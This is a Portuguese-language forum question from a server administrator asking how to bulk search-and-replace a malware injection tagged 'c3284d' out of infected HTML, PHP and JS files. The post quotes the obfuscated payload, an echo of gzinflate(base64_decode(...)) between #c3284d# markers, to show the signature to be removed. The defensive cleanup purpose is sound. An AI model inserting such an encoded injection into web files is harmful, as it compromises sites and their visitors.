Limpe o servidor infectado com o vírus c3284d, usando a pesquisa e substitua
Estou tendo um problema com o vírus Notorious c3284d. Ele modifica praticamente todos os arquivos html / php / js que ele pode encontrar.
Eu mudei todas as senhas e usuários no servidor, por isso, se é uma conta comprometida, deveria ter resolvido esse problema, mas ainda estou lutando para removê-lo completamente.
Consegui encontrar todos os arquivos infectados usando um simplessudo grep -R "#c3284d#" /home
comando.
Mas preciso de uma maneira rápida de pesquisar esubstituir isto.
A assinatura do vírus é esta linha:
"# # C3284d" eco (gzinflate (base64_decode ( "VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + Hiek + Pqabw =="))); "# / c3284d #"
Quando a linha de eco pode mudar e variar, mas sempre começará com#c32..#
e terminar com#/c3....#
.
Eu só quero substituí-lo por nada.